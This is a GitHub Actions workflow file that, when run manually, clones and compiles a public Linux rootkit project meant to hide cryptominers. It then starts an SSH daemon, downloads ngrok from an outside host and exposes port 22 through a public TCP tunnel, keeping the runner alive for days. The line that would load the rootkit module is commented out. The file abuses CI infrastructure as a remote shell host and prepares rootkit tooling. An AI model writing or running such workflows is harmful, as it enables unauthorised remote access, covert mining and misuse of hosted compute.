name: Ubuntu 20.04

on: 
  workflow_dispatch:
jobs:
  build:
    runs-on: ubuntu-20.04
    steps:
      - uses: actions/checkout@v2
      - name: Run settting file
        run: |
          git clone https://github.com/alfonmga/hiding-cryptominers-linux-rootkit
          cd hiding-cryptominers-linux-rootkit/
          make
      - name: LOADING
        run: |
          cd hiding-cryptominers-linux-rootkit/
          #sudo insmod hello.ko
          sudo /usr/sbin/sshd -D
      - name: tunnel
        run: |
          sudo apt-get install tar wget jq -y
          wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.tgz
          tar -xvf ngrok-stable-linux-amd64.tgz
          ./ngrok tcp 22
          curl -s localhost:4040/api/tunnels | jq -r .tunnels[0].public_url
          sleep 400000
